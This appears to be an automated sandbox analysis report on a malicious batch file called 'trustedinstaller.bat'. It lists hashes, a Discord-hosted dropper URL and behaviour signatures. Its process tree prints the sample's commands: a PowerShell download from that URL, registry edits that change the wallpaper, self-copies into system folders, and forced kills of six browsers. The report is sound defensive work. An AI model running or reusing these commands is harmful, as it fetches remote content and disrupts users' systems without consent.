Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    136s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/07/2024, 19:42

General

  • Target

    trustedinstaller.bat

  • Size

    3KB

  • MD5

    a342c02d8b85d351af8871776fc67dd7

  • SHA1

    4b7c7e5697cee05354f0902a3c40d35c7c892a7d

  • SHA256

    9802eda5439017e0b2fe42d53bbeac75176c52b4383e33d1a4cb445a00b16b8b

  • SHA512

    7ae1f71e87dc52c2dd640c025ca623304e28717119c52107163d905e8f17d6a20de243e6a1cf8f75ab9e797224b47eae199a669e209998620625b20c099657d5

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 31 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 7 IoCs
  • Delays execution with timeout.exe 15 IoCs
  • Kills process with taskkill 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\trustedinstaller.bat"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4172
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      2⤵
      • Sets desktop wallpaper using registry
      PID:4616
    • C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      2⤵
        PID:2088
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        2⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:3836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:564
        • C:\Windows\system32\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:4836
        • C:\Windows\system32\rundll32.exe
          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          3⤵
            PID:3556
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
            3⤵
              PID:3564
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3392
              • C:\Windows\system32\reg.exe
                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                4⤵
                • Sets desktop wallpaper using registry
                PID:5740
              • C:\Windows\system32\rundll32.exe
                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                4⤵
                  PID:1272
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                3⤵
                  PID:3908
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3264
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                    4⤵
                    • Sets desktop wallpaper using registry
                    PID:5064
                  • C:\Windows\system32\rundll32.exe
                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                    4⤵
                      PID:5672
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                    3⤵
                      PID:3992
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3320
                      • C:\Windows\system32\reg.exe
                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                        4⤵
                        • Sets desktop wallpaper using registry
                        PID:4904
                      • C:\Windows\system32\rundll32.exe
                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                        4⤵
                          PID:5360
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                        3⤵
                          PID:1692
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3860
                          • C:\Windows\system32\reg.exe
                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                            4⤵
                            • Sets desktop wallpaper using registry
                            PID:4332
                          • C:\Windows\system32\rundll32.exe
                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                            4⤵
                              PID:5988
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                            3⤵
                              PID:4260
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                4⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:448
                              • C:\Windows\system32\reg.exe
                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                4⤵
                                • Sets desktop wallpaper using registry
                                PID:1128
                              • C:\Windows\system32\rundll32.exe
                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                4⤵
                                  PID:5284
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                3⤵
                                  PID:1160
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1488
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                    4⤵
                                    • Sets desktop wallpaper using registry
                                    PID:5700
                                  • C:\Windows\system32\rundll32.exe
                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                    4⤵
                                      PID:1980
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "chrome.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4924
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "firefox.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2756
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "msedge.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5196
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "opera.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5736
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "brave.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5160
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "vivaldi.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5032
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 60 /nobreak
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:5844
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 60 /nobreak
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:2732
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 60 /nobreak
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:5732
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                  2⤵
                                  • Drops file in Program Files directory
                                  • Drops file in Windows directory
                                  • Suspicious use of WriteProcessMemory
                                  PID:5116
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3588
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                    3⤵
                                    • Sets desktop wallpaper using registry
                                    PID:2452
                                  • C:\Windows\system32\rundll32.exe
                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                    3⤵
                                      PID:2280
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                    2⤵
                                    • Drops file in System32 directory
                                    • Drops file in Program Files directory
                                    • Drops file in Windows directory
                                    • Suspicious use of WriteProcessMemory
                                    PID:3700
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3384
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                      3⤵
                                      • Sets desktop wallpaper using registry
                                      PID:3212
                                    • C:\Windows\system32\rundll32.exe
                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                      3⤵
                                        PID:3404
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
                                        3⤵
                                          PID:1832
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1452
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                            4⤵
                                            • Sets desktop wallpaper using registry
                                            PID:6120
                                          • C:\Windows\system32\rundll32.exe
                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                            4⤵
                                              PID:4952
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                            3⤵
                                              PID:4176
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2312
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                4⤵
                                                • Sets desktop wallpaper using registry
                                                PID:3640
                                              • C:\Windows\system32\rundll32.exe
                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                4⤵
                                                  PID:5028
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                                3⤵
                                                  PID:2740
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5396
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                    4⤵
                                                    • Sets desktop wallpaper using registry
                                                    PID:5288
                                                  • C:\Windows\system32\rundll32.exe
                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                    4⤵
                                                      PID:2636
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                    3⤵
                                                      PID:3124
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5200
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                        4⤵
                                                        • Sets desktop wallpaper using registry
                                                        PID:4400
                                                      • C:\Windows\system32\rundll32.exe
                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                        4⤵
                                                          PID:4292
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                        3⤵
                                                          PID:1600
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1624
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                            4⤵
                                                            • Sets desktop wallpaper using registry
                                                            PID:3556
                                                          • C:\Windows\system32\rundll32.exe
                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                            4⤵
                                                              PID:3168
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                            3⤵
                                                              PID:1316
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3744
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                4⤵
                                                                • Sets desktop wallpaper using registry
                                                                PID:5220
                                                              • C:\Windows\system32\rundll32.exe
                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                4⤵
                                                                  PID:4432
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "chrome.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2308
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "firefox.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4836
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "msedge.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4712
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "opera.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3496
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "brave.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3500
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "vivaldi.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5780
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 60 /nobreak
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:5960
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 60 /nobreak
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:5136
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 60 /nobreak
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4716
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                              2⤵
                                                              • Drops file in System32 directory
                                                              • Drops file in Program Files directory
                                                              • Drops file in Windows directory
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2920
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                3⤵
                                                                • Blocklisted process makes network request
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1564
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                3⤵
                                                                • Sets desktop wallpaper using registry
                                                                PID:2188
                                                              • C:\Windows\system32\rundll32.exe
                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                3⤵
                                                                  PID:3168
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
                                                                  3⤵
                                                                    PID:2596
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                      4⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5208
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                      4⤵
                                                                      • Sets desktop wallpaper using registry
                                                                      PID:2100
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                      4⤵
                                                                        PID:4736
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                                                      3⤵
                                                                        PID:676
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5512
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                          4⤵
                                                                          • Sets desktop wallpaper using registry
                                                                          PID:4408
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                          4⤵
                                                                            PID:3872
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                                                          3⤵
                                                                            PID:3644
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5224
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                              4⤵
                                                                              • Sets desktop wallpaper using registry
                                                                              PID:4108
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                              4⤵
                                                                                PID:5256
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                                              3⤵
                                                                                PID:3432
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5848
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                  4⤵
